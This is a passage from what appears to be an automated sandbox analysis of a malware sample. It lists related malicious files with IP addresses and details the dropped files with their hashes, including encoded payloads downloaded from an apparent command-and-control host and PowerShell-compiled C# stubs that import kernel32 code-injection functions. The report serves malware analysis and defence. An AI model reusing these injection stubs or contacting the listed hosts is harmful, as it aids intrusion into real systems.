	QwLijaR9ex.exe	Get hash	malicious	Browse	216.239.32.21
	pfjgWtj6ms.exe	Get hash	malicious	Browse	34.98.99.30
	6Xk6d54hwM.exe	Get hash	malicious	Browse	34.102.136.180
	eYwQ9loD5Q.exe	Get hash	malicious	Browse	34.102.136.180
	SK8HSWos1p.rtf	Get hash	malicious	Browse	34.102.136.180
	MV SEIYO FORTUNE REF 27 - QUOTATION.xlsx	Get hash	malicious	Browse	34.102.136.180
	order_list_fe99087.xls	Get hash	malicious	Browse	216.239.32.21
	CaAmqz52Yk.exe	Get hash	malicious	Browse	216.239.38.21
	E68-STD-239-2020-239.xlsx	Get hash	malicious	Browse	34.98.99.30

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{E1BA15B0-6BF5-11EB-90E6-ECF4BB82F7E0}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	71272
Entropy (8bit):	2.036853286280987
Encrypted:	false
SSDEEP:	192:ryZ9ZW2eW3tKifeRHJzMJBC6eVBgCptD9asAavVtHm1a+9s2Ok+EhkquiOkqH4m5:ruztVdTXoZRB3BMYgc1
MD5:	DF09867101E3F8250FBE69F8D23A4B73
SHA1:	BFA09E7C5A3086E01BFF99115E15B1E5CD8722D7
SHA-256:	719032F8605BCEEC1A8EC3E72D1CB407C2DA4C950A001588D5099C683366D4C8
SHA-512:	7CEEF13B0ED2498471444117B806BB0C35430FB647467D8606FD8A3D3804E4D247DEC080786C55E0A66C111617B1D82B70647A2774F107DB00FE1A64F4A6FDF5
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{E1BA15B2-6BF5-11EB-90E6-ECF4BB82F7E0}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27592
Entropy (8bit):	1.9063458055602907
Encrypted:	false
SSDEEP:	192:rVZiQ268k7jN21W+MaBQ9caQlRdlQ9caQlRa9cPA:rbPBhnEMXCjlRfjlRw
MD5:	364B6E0AA1651A7AE7CF03BA0480CE9C
SHA1:	2D6D4F4B05DBF0C591611232A9E19C00392E28F7
SHA-256:	6B0EDB1E1F7B5533BFD311E809E10EF132E339C6E72FB225E9325349918DE83C
SHA-512:	90B047B7F19C7AADF1DC82FC1F1F8C3CF60E34D291F3EABC2669F49A76850A9C427F53B64B29145C6941B4348758204DC09B0FE29FF7C14A47585AB83A30D4D9
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{E1BA15B4-6BF5-11EB-90E6-ECF4BB82F7E0}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28160
Entropy (8bit):	1.9152388232640587
Encrypted:	false
SSDEEP:	192:rdZeQ76DkRjt2GWlMRpl3API5Vq3APIeA:rzb+Itk9mbGPE/PM
MD5:	7EFB43ED6ECDC8B3570A04A5CBA04CCD
SHA1:	DB0C541B57D7E548316C1F0A7CEA70DB787D6AFC
SHA-256:	6FDE2C85058D5DE139C661A710CFA6E07D6ABFB9F7ABA943D631EE9F1E9F59DF
SHA-512:	DC4582B4D4BF21DD27D2E0619C0C4E1EFCE57BF4BE21D0A82473F20FB9B5D48AADA3961ECE077FC5DA6432C8DA2929757B977896C770D5801E3C3092DEED90A4
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{E1BA15B6-6BF5-11EB-90E6-ECF4BB82F7E0}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	modified
Size (bytes):	28168
Entropy (8bit):	1.914344516289633
Encrypted:	false
SSDEEP:	192:rDZAQH61kNjN27GWQMUB8sVYtHl8sVrsVYtmA:rFZa+pExl89+/9u+X
MD5:	77E2081D6B12BA1F82C27A50A61F41A2
SHA1:	7D7D20463427B20B2496F504450158988B664F36
SHA-256:	0B925B764B23695484C25E534672AEA304964C4171355CE8444741303ED99718
SHA-512:	2E949F3C62B54EF060136FEBB534E3DB51E156BDBAB3F75AC9153D1BC83EBD6D74AB28DF20E6D7DF3587307C45D90DFBCF2DAC4EAE5FF870D4E9289937B4C7AA
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\Bn8ddXU[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	268376
Entropy (8bit):	5.99986572855491
Encrypted:	false
SSDEEP:	6144:P//YVVzIMeq+LNg0lu4FYPG4JcPj5hUHBDgegKOlx+eeXUa:PnYVV0Me7Ng0lxFYO4JcPjvUHaBKEx+d
MD5:	894CB0CC7F8D2DCD25FE8C9ECD291A55
SHA1:	53CD35A91200A6A714464B79C5BF515C24C7981B
SHA-256:	DEC91CFEC640FEC357A71EE645D392877FB431FFAACAD6B7092311059FDAEC48
SHA-512:	E50954B2F62EF8EC47EB1785B596F154DFB2008B080D1B56E33AF181DA0489B9865C096B55B824686CBCB33B54DC005A73EDFBA90F62E9679B89B26FE5C41FEE
Malicious:	false
Reputation:	low
IE Cache URL:	http://api10.laptok.at/api1/AOpX_2BLE_2B_2B/x33_2BOxagWAsMnrX_/2B_2BU6zh/wlNMMjJfhf4dJdxy0gqf/YX9lknlxGzswe1f42DY/0ZRJKHiwVKqzREh7F1zZfC/xDcrm70JTSUqg/KfoZXHqy/gtcnRpNm54H7DKUH3incyf7/pb15dMsyWG/BetCueYOwQDaUpKex/cvRYM5W54J_2/F_2BvDZYdxx/C0N9hknbzclgNA/1DbqE0vpldFICv5iJdPAy/ml70ZyZiOpRDJ78b/h5qzpBVY36LCiZe/ZMZBhSfYbmpSZEV5ew/ylnSPhfpP/ctfktke6drAYijwp6R_2/Bn8ddXU
Preview:	MXaT+k4mMtUL9eYPx2IlrpVm5upz2PvttLY1qPTY4E7P0iDWMDKUVrMLiWZRLRvv4/oBUW3cK82i8ig2GDboc09zhqX9u+BGv+dBLxLSPCX7qIeK9cHrtuRXecLomv5Rlgpeqao+Ls8qSXdmgymnpFj3YuEVjbyT6owoZfWPDXFtDfLqksZxOvZ040PqrNLjYbYWSdDlcAjJHuOpRANEiVs4sbFFlviC4bxG4XapJzbtqC0dBhTOFliTDMk3caR/n7IKOeOITfEVjZVIlADVUeCvL2V3uzmxgs9QwCioqVMQvr6Ib50cLnQ4r1FUhlvd2vukPUR/gdk+/qYHJf2tKppPJaP8Ql1bou0IgnZJRwdeEzBPnWy8Cq359lpDlELzM1BvRrCfrCGgccZBUPls8g7dhmTLzMF9IEvLuuY/ix4z0mxSk0xjGY4DkLgU+hgAMIlvQW1b7hctELu4pYxiGKW/nHeWDhEZbKFKsrRvYFR4Jv7QTLaspOCS0mcM671uGpU/QH325vCDU1I3K9Jng2Y4/USpIVT8i0+omqAc/vREp2N+ZotfwiZD+dIRnxdmisySkkZJGQFssMWr7JnDQeE8KdW2BRlU2n1VzDZVAv8reWdhnUAsG76tRQ+kQW1GfLPVjrTinLbrjtzK00xQT2xqz9q/ZUddT1TLqOMRcQK1Hma1n8DYU3xfnYnYt37j6JwSdtOtMKEgELW+eDZ68YVLKUIuw1j6b2Va7LbPpM6KquFxgZpmzXTr3So6I0eAN+9RtwqIuXlEbwUOz8Lwc8vlZkUl3m5De+Canb+OXZyLFJ5BC1+UA06vq9xZYDmPIcmj5+OZC4HV23py2m56jgssNGS1Jtt/Pje+kWEMKvKfyg6LcDGKH2iQcpSSBTmVuee/DOmMpPr46Z0ItSIHaSdlTXVcIB1KetjPjhANbAGy/a3Pia1AVoLZUzP3IeG8+DwEqQScjsHsKHTrlUB0hLb5PRWfYiPRHhCVu7+b

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\s[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	340056
Entropy (8bit):	5.999886531203639
Encrypted:	false
SSDEEP:	6144:1xweTwNw6sNoJ+l4Zdpa0XjzOPMMY4+Do6I9OHt1Sq49x90fGQh9UmHYS8pyiEaP:weT5BQ+l4ZdpVWMMY4+0jAHt1SLePdHS
MD5:	F63F71D70312557722C592AB8260C283
SHA1:	6FC1F160C1E50EC5DB8C0E64067C34ADFE6DF94C
SHA-256:	1EC8D9741146A63B75AEA79C12E26DE14922A191AF1DE5BC396785B20EF298AB
SHA-512:	9C4AF768F8CC3A595C2009F7E233A63610B6C5DB964009F85D5B6FA8B811DA9C2450164589ABED7C667C491D14442845CE338F12A845E0EA2081A7A018AF32C6
Malicious:	false
IE Cache URL:	http://api10.laptok.at/api1/1Pg3i0gSwH/_2BK37nF8HXWhrouM/t7ZtEKshXTnV/JlSrHeYCtLF/7DzeevtXCQ9YRw/K2S8BQMDt78kCRWVvFKTW/T3z7jl77vtn31nAs/fsEjsZ1w6_2BM0e/_2B_2BAVLSWZlML2mx/fdFEX0w2l/0RPfFIvYjfZTYoK47bE8/B49X4mtNiudogIoMpOJ/IxyYMxMKBO_2F3ZR_2BAor/8kAylO6X_2Fiq/EdNEwQOa/FYHDMjDZgQLZqSkWO3yLWuc/j3i_2F5QMC/DRHsxypVX90thJgYh/6MpfO8pdNUGy/KOAPjs479Yf/dCe7rPiQO_2FVf/cp_2BP6SlyfefKqn_2BbT/iqLzQdVK/s
Preview:	v4U9FOMffNn54WSmRpTazGdNkEvlmCRiGYoc/Fx/B0uF5jmHMfw6HVfXpB3sw62bd5Q3wiRWbUNTGM7cBMhVvqdV+YIofbWo5orvt5y70J7ms7ia0BNzJNCCuQcGdTmrY40P9TgVH/4mpwjvEy5RnIcp3TNqe7AUUwcd03dz3KtgKhDAeTEo2svMCOS2xystufZZ2NsxJrqLSCt5axW7rbUIhuAKEgO3sL1MMgkMLrAcTySTkY+JT2GtadrpNtb/n5BrLU9/+hU11MjBBJJoFC34AhiA5Dl8tb7R4QfE9tWN910YNIlSaWbpW1W0rgQGYBRpZCKeBcYKDwJugvy0Q8HUVzdlp0vjWTHA7bv6n8YeAi/cyRTis8QaJ7m8wnmD6Mp3nB1DH2+iCH6jRRwi4USPvT1XQOkCieiDJ+bT7bVAXu1c7iCECnJ4NJjleLeghNHjBkEmbHuw0tCOZ0RvjMaArUx2PrHvjK6xG7n9q78ZqEFZzQXOsJz5xbbfHQg0tlVmnJd0R3tKXD6xp1KQcLlxqM1T9w2gSK93tlICJn+5BZ42XTcAixNGhbs956aeBFVMLWG56zTyFmW2nturquinOJ3cS/54k+A1NBAfqSEy8MqFLn3qAzF/kDqU2Bnusf1LcKcyKIZEuqEYkWJ5JfWsJqc+5xK2Hu50SQQs+sY2PUG2Wic9urhQ/VNEnrUMeBkPguKujTjy22ehFTttRnxCe0xbepgVJs3QJVpJ1HqeelFgqmrJFBp4FJE9dgkLq/ZwHLD140ZCKVEcsX7/WtboORm1WQ+ktFRALp14jHucNdbOKW8kdC4506IC/pCGDbBqpmZg0s8CdkFAtacx1ByPE8iZeRePyPHgJ0J7A1lB9ZrSDBbs01SUunVT0cuW4qTgIHUFAdnCm5SkdIaYoFtB56K8oC+/PPpktRk7HiSuZExIHJlG+nG9TWN5U20aeCK+d3alKX7r8iM1UXqcphJVDhmZGAOnaAiIJQ/O

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\RC[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	2452
Entropy (8bit):	5.9891472068248675
Encrypted:	false
SSDEEP:	48:ubGcN0E+8HZmz6Z1K49CUct/K1+YMXZ/ZRLaP9zNHB1oE+0plUpi0E3zeGtM:3cN1WgLcty1+YMpBROPZNhd+0pGDEje7
MD5:	3911A5CD043629DE358BF4D794062E07
SHA1:	D6F0991B11B84B676A27260A6D79ABD0BCD544FB
SHA-256:	A6F4E2B905615E2D4A9DF6454BD86A911D55CC27C7D43F1E0D94B642C34F450C
SHA-512:	8D90C352803B21B084D00610E04D71DB14F479F3A8FCA1081AF383905C135B3DF3F1BF546B7E88D584FE0128BA3153113EF26576A18A22337F1CFC183A625FC7
Malicious:	false
IE Cache URL:	http://api10.laptok.at/api1/fXWtKegXNhimfshJm11/ybi6PbAu_2FzbCxUMkXaR0/07xh_2FjserNk/Akz7MnFa/ilUyiG77Zbx14Y4xpnJSaU_/2BLefveYrx/RefMzSY5Upyfbovm3/qmR0BBGI5hNv/ThDaqb_2FWx/xtufh9Msga_2BR/n0Re_2F1kn8UjgqbyTzQA/dUEEQb_2FY20zF3P/aP2AGWgGjayZp9N/yWUTgNMTKZ6EUJxA4O/ga_2BAyhH/6Y4krin4Qd0F9dpWa_2B/Ch_2FWBvvOfaFtGBtaq/0_2BX8pwR_2BJW2aCmXSlR/nA3h5ZuemZjTY/QscPrV_2/FMUurtz9meWYyTWZTPSvYNG/TWbWCTxFm9i/RC
Preview:	cFsy+k/zwCefn0M9Z9Z1qopBYO1bp8MpPaX0CCcMjQBbGNzyM2mmwXUvqmsi/iVW4s/Kgh2RHqpVOwCX/fZa0ZCKifm2RE7gJl6uj8Aq1Is9ktLv03w7mxSeqgcsHuWV96oejed2yhwZi4/7MpGd/Al25OkS+0eFPHLGajQ5plKbhhmo0mUY1yQMcv/7mnJ3HgLZSEdvZ3lzUoyhkYb1PNgq8WjANP+74x7Ea44fFaIdTOLtvW2L0z/PHQfI9ao3Jc8sfK+cfDVmNeL5e6L6PGsqEIIyp9QxFhmQMV3Ean4ri3fyzKPDlK3ZH36BeQ6ibrsn3c3scSeT9d97cFVSb6kRk2CnKDJBvVKNOrDS+2VBbVO5okNBxKxqAd0jqlf/zc+aRHkG8NTNPBeNGNg7DDoZCvJ9BTDpvA2XXDg3xBH/UDajYc9Ct9OHz2WYzRlTsYadbe0Ra4Z29kCfn5oODSM8BVJ40li6xZYJoZUBH2B670ky1fgifSKUNENw4PjdeJuEHJynaWA//ExR5QN+baBhCbVYTlIViQ0c8tLY9zYsGpDd5yAXSdGY4CeJTvyikBqm3zQazM3i99bsLerBOsrV4zyuA4yvLzpfNMIFt6ONJ8Ow2rH2+IoSEvx8LpoSD5Yxkw0r2RR+po2KOtu6qvvwVn9+IdWkEpkzu4X/Z9vgIzxe14LIgi+jKAZYx2gglvQmBB9+wWNiIyacmnv327rLreVEu3rV+BeyMupg6efVfG3j1+6WxnqOEMHxjB2jxUTYo8wymTZNfusKv95zhR13UYsSbmioPDtoSLqqZfLUPnGyS+3LIAJxE+J69TFbkiEGBVpicEu4bfKy6TW8RneRLn7fYhvopPdSdGWisAasmMpzIGbQWoUkCCz4qT/I56cZoYjByatu+xeJgOUKP9JjFwVZ8eine+CRChXjbufzpwU0ket48BfN7Hejlyo0xgt5y+W57568yqfywTuKdx+IIVult9g/qO/9N90V

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.9260988789684415
Encrypted:	false
SSDEEP:	3:Nlllulb/lj:NllUb/l
MD5:	13AF6BE1CB30E2FB779EA728EE0A6D67
SHA1:	F33581AC2C60B1F02C978D14DC220DCE57CC9562
SHA-256:	168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
SHA-512:	1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\JavaDeployReg.log Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	89
Entropy (8bit):	4.45974266689267
Encrypted:	false
SSDEEP:	3:oVXUHMkQKR8JOGXnEHMkQKwun:o9UaaqEaBu
MD5:	AC56B7F46C974F8C46780540160E8CD1
SHA1:	A1D125750D9A342A2AAEA7953121991A08A32588
SHA-256:	AC7F1B99012C8F08604FAD41B1E2E1CA0A112145B9C0C4E7A446E417FC46EFBF
SHA-512:	F7F6C24D40548379142B051F48FF005BB782FFFC508C88A9027174F43F4052AF90525DB6D6E6F80FE5395B1CDBA4B893825BBD4113966A641AEB0E197C08D1EF
Malicious:	false
Preview:	[2021/02/10 15:15:47.378] Latest deploy version: ..[2021/02/10 15:15:47.378] 11.211.2 ..

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4vwmmr5w.fli.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iq44l33x.4n1.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\jomxz5kw\jomxz5kw.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	411
Entropy (8bit):	5.022568322197063
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJwQ5mMRSR7a1yTyShSRa+rVSSRnA/fh14v02JKy:V/DTLDfuqRySQ9rV5nA/TDy
MD5:	9B2165E59D51BB6E8E99190BD9C6BC8B
SHA1:	02B2F188D7654CA079ADA726994D383CF75FF114
SHA-256:	36E14435EE02B02C2B06087FF3750569342E8B8D8571F3F45E61AF50D3B03CEA
SHA-512:	20E05DE0D57D1F6F53FB3290CB1C533D152C6076E2451B0A463D5AD6342976F49F31DDA8CC668E3EC26775E75EE191B8DD44645F40F723667EE8376C84998209
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class tseeoxqndt. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr jphxxkfdthf,IntPtr lnf,IntPtr uet);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint wwqqeyldba,uint ccghpcxllqj,IntPtr tobsn);.. }..}.

C:\Users\user\AppData\Local\Temp\jomxz5kw\jomxz5kw.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	377
Entropy (8bit):	5.295656735826802
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2cNwi23fPdIzxs7+AEszIcNwi23fPd/9n:p37Lvkmb6KwZH+WZEJZHzn
MD5:	D73F765AC032CEA3F9323DCAED890E6B
SHA1:	2934F90F8F1798940B157A8A1F61F4C8EC5BFC06
SHA-256:	4E7A2A7A38D2B63F5D8D7EBCBD35A8D9577DC8E9B1EEAE92C243E0AFD2CF6C84
SHA-512:	57DFB6E01D005720C9F5AC0D6A0265C467EF24BF1EB6621D03E97461C85E52EA1C8277AA58F72A9F1E1D130C1E92F4DDF056EACA9CB47244AEC8FDFB324C9892
Malicious:	false
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\jomxz5kw\jomxz5kw.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\jomxz5kw\jomxz5kw.0.cs"

C:\Users\user\AppData\Local\Temp\jomxz5kw\jomxz5kw.out Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	462
Entropy (8bit):	5.400028983229418
Encrypted:	false
SSDEEP:	6:IM7mLAA9VwRhMuAu+H2LvkuqJDdqxLTKbDdqB/6K2cNwi23fPdIzxs7+AEszIcNF:xKIR37Lvkmb6KwZH+WZEJZHz+
MD5:	3379AD6C0C28F4AA1426E2AA04D35BFD
SHA1:	13B83CB4F1BF6F6085DDCAA8AB3D809EA209C155
SHA-256:	67FBC7767356EA93B23EE908AD04C8EF7A51D86F260B9C7E7460768E6F88CB6A
SHA-512:	BCD04B4F2C2580058B2C7A522C0FF409BAAA182DE3A2765E475FF0C8D257B7EBCAB5821D4B61B09F3DF16A38E93C64111496F0496F4672C8B16DB3915B7E0F27
Malicious:	false
Preview:	.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\jomxz5kw\jomxz5kw.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\jomxz5kw\jomxz5kw.0.cs"......

C:\Users\user\AppData\Local\Temp\qidcr3ig\qidcr3ig.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	413
Entropy (8bit):	4.95469485629364
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJAMRSRa+eNMjSSRrEMx9SRHq1DAfWZSEehEFQy:V/DTLDfuA9eg5rEMx8u25hZy
MD5:	66C992425F6FC8E496BCA0C59044EDFD
SHA1:	9900C115A66028CD4E43BD8C2D01401357FD7579
SHA-256:	85FEE59EDA69CF81416915A84F0B8F7D8980A3A582B5FA6CC27A8C1340838B6C
SHA-512:	D674884748328A261D3CB4298F2EB63B37A77182869C5E3B462FAB917631FC1A6BB9B266CAD4E627F68C3016A2EEADCD508FDDBAF818E2F12E51B97325D9406D
Malicious:	true
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class iteocetkyp. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint hmli,uint odfa);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr cieceahsrf,IntPtr qipockeo,uint fmaounwoa,uint hdhq,uint fssner);.. }..}.

C:\Users\user\AppData\Local\Temp\qidcr3ig\qidcr3ig.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	377
Entropy (8bit):	5.234228044756695
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2cNwi23fhW8BHH0zxs7+AEszIcNwi23fhW8DH:p37Lvkmb6KwZpFUWZEJZpPH
MD5:	446A92A1E2D822C8F9F92DCB3F2D900B
SHA1:	0D392001482565526F910197907AAAA547B4D30D
SHA-256:	4F87A5DE81196FA5F977390E9AEBD50E8A9B41B72D76D2ED1F47C4D9B3713261
SHA-512:	BFF2676061BAED37DE47D3EA3094C706BC9F635E5E9D189C6BFEDB611CB0D45EF5EF195DE505ED19F7BDB694208D9D583336D51C48B987B281FE40BEE64F6460
Malicious:	false
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\qidcr3ig\qidcr3ig.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\qidcr3ig\qidcr3ig.0.cs"

C:\Users\user\AppData\Local\Temp\qidcr3ig\qidcr3ig.out Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	462
Entropy (8bit):	5.352977848393511
Encrypted:	false
SSDEEP:	6:IM7mLAA9VwRhMuAu+H2LvkuqJDdqxLTKbDdqB/6K2cNwi23fhW8BHH0zxs7+AEst:xKIR37Lvkmb6KwZpFUWZEJZpPe
MD5:	2949F8143DCE7B1D7AF6C6F3D0C1BE5A
SHA1:	8778CAB63CDD31AE7EBCA343F0E7BDCD551DEC29
SHA-256:	47A94EEBBBA630B341499F1567C6293382F16474C10D08FD1DCDD1BDC832925D
SHA-512:	84807D0BDC0A52B735DA78383638BD0BC8AF7746DA8D92359BA3AC190F9E0DA14D47AA71D469496871EF49C0D738E3896BB7FCCC76B6C33C842D775AD519AB41
Malicious:	false
Preview:	.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\qidcr3ig\qidcr3ig.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\qidcr3ig\qidcr3ig.0.cs"......

C:\Users\user\AppData\Local\Temp\~DF051F935A0216EDA8.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	13269
Entropy (8bit):	0.6103640625181596
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9loJ9lop9lWkRKuyu3APmW:kBqoIysWK2APmW
MD5:	6024D4D37AEB823BC4AB3AE0EF49A1B1
SHA1:	91C5B02835C93C4A80B47CCF087B6496AA502811
SHA-256:	4C0D04E4087FD1B1BC3F0C3E4843576862C1EFC07A3272342A691E9CB9E98870
SHA-512:	BF646841D5F113A443238DBB9E8CD106ADBC36ECDA58A406A0C69308A4A16BE72542A9EA0F74AB5423B50DE61612B2AA213C026BD6A6E210A45EBB2554F794F7
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF261AC9CD53787C21.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40209
Entropy (8bit):	0.6730675925195002
Encrypted:	false
SSDEEP:	192:kBqoxKAuqR+FrJ4biDYsVYt+DYsVYttDYsVYte:kBqoxKAuqR+FrJ4bi9+Y9+n9+g
MD5:	BA8745C5334040BF64073483349DCC92
SHA1:	4395DF3D29D467D5218AF9B8DB739ACDBC3476E1
SHA-256:	D4BAF7F316BC61134DFF7ABD147F417AA4E4D043C9211522F265843DB1217C9D
SHA-512:	F1060AA1751145BF481FE7B765F4D5714EEBC3F97AE0CAC946C8A613AEB2C9B23EB3B8133EE977445CB8F5E59FED24D0EFA552913E241555545B53D9B9CCBB9C
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF591D27F1DF86430B.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40081
Entropy (8bit):	0.6522001093489276
Encrypted:	false
